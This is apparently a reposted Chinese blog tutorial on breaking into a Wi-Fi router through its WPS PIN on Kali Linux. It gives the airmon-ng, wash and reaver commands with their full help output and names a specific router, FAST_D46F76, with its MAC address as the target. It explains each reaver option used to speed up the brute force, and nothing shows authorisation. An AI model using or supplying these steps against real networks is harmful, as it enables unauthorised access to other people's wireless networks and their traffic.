开启网卡监听模式
1
<code>airmon-ng start wlan2</code>
查看开启QSS快速连接功能的路由器
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<code>root@kali:~# wash --help</code>
<code>Wash v1.4 WiFi Protected Setup Scan Tool</code>
<code>Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <</code><code>cheffner</code><code>@tacnetsol.com></code>
<code>Required Arguments:</code>
<code> </code><code>-i, --interface=<</code><code>iface</code><code>> Interface to capture packets on</code>
<code> </code><code>-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files</code>
<code>Optional Arguments:</code>
<code> </code><code>-c, --channel=<</code><code>num</code><code>> Channel to listen on [auto]</code>
<code> </code><code>-o, --out-file=<</code><code>file</code><code>> Write data to file</code>
<code> </code><code>-n, --probes=<</code><code>num</code><code>> Maximum number of probes to send to each AP in scan mode [15]</code>
<code> </code><code>-D, --daemonize Daemonize wash</code>
<code> </code><code>-C, --ignore-fcs Ignore frame checksum errors</code>
<code> </code><code>-5, --5ghz Use 5GHz 802.11 channels</code>
<code> </code><code>-s, --scan Use scan mode</code>
<code> </code><code>-u, --survey Use survey mode [default]</code>
<code> </code><code>-h, --help Show help</code>
<code>Example:</code>
<code> </code><code>wash -i mon0</code>
使用-C参数,BSSID为AP的MAC,channel是信道,RSSI是信号值,数字部分越小代表信号越强,WPS Locked就是WPS锁死机制,ESSID是信号名称
<code>wash -i mon0 -C</code>
选定FAST_D46F76路由器开始攻击
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<code>root@kali:~# reaver --help</code>
<code>Reaver v1.4 WiFi Protected Setup Attack Tool</code>
<code> </code><code>-i, --interface=<</code><code>wlan</code><code>> Name of the monitor-mode interface to use</code>
<code> </code><code>-b, --bssid=<</code><code>mac</code><code>> BSSID of the target AP</code>
<code> </code><code>-m, --mac=<</code><code>mac</code><code>> MAC of the host system</code>
<code> </code><code>-e, --essid=<</code><code>ssid</code><code>> ESSID of the target AP</code>
<code> </code><code>-c, --channel=<</code><code>channel</code><code>> Set the 802.11 channel for the interface (implies -f)</code>
<code> </code><code>-o, --out-file=<</code><code>file</code><code>> Send output to a log file [stdout]</code>
<code> </code><code>-s, --session=<</code><code>file</code><code>> Restore a previous session file</code>
<code> </code><code>-C, --exec=<</code><code>command</code><code>> Execute the supplied command upon successful pin recovery</code>
<code> </code><code>-D, --daemonize Daemonize reaver</code>
<code> </code><code>-a, --auto Auto detect the best advanced options for the target AP</code>
<code> </code><code>-f, --fixed Disable channel hopping</code>
<code> </code><code>-5, --5ghz Use 5GHz 802.11 channels</code>
<code> </code><code>-v, --verbose Display non-critical warnings (-vv for more)</code>
<code> </code><code>-q, --quiet Only display critical messages</code>
<code> </code><code>-h, --help Show help</code>
<code>Advanced Options:</code>
<code> </code><code>-p, --pin=<</code><code>wps</code> <code>pin> Use the specified 4 or 8 digit WPS pin</code>
<code> </code><code>-d, --delay=<</code><code>seconds</code><code>> Set the delay between pin attempts [1]</code>
<code> </code><code>-l, --lock-delay=<</code><code>seconds</code><code>> Set the time to wait if the AP locks WPS pin attempts [60]</code>
<code> </code><code>-g, --max-attempts=<</code><code>num</code><code>> Quit after num pin attempts</code>
<code> </code><code>-x, --fail-wait=<</code><code>seconds</code><code>> Set the time to sleep after 10 unexpected failures [0]</code>
<code> </code><code>-r, --recurring-delay=<</code><code>x:y</code><code>> Sleep for y seconds every x pin attempts</code>
<code> </code><code>-t, --timeout=<</code><code>seconds</code><code>> Set the receive timeout period [5]</code>
<code> </code><code>-T, --m57-timeout=<</code><code>seconds</code><code>> Set the M5/M7 timeout period [0.20]</code>
<code> </code><code>-A, --no-associate Do not associate with the AP (association must be done by another application)</code>
<code> </code><code>-N, --no-nacks Do not send NACK messages when out of order packets are received</code>
<code> </code><code>-S, --dh-small Use small DH keys to improve crack speed</code>
<code> </code><code>-L, --ignore-locks Ignore locked state reported by the target AP</code>
<code> </code><code>-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet</code>
<code> </code><code>-n, --nack Target AP always sends a NACK [Auto]</code>
<code> </code><code>-w, --win7 Mimic a Windows 7 registrar [False]</code>
<code> </code><code>reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv</code>
使用如下参数
<code>reaver –i mon0 -b 28:2C:B2:D4:6F:76 -a -S -d 3 -t 3 -vv -c 1</code>
-i 网卡的监视接口
-b 目标AP的MAC地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-d 即delay,延时 预设为1秒
-t 即timeout,超时 每次穷举等待反馈的最长时间
-vv 显示更多的非严重警告
-c 指定信道,可以方便找到信号
晚饭吃完回来,希望能够破解出来:)
本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1420938如需转载请自行联系原作者
谢文东666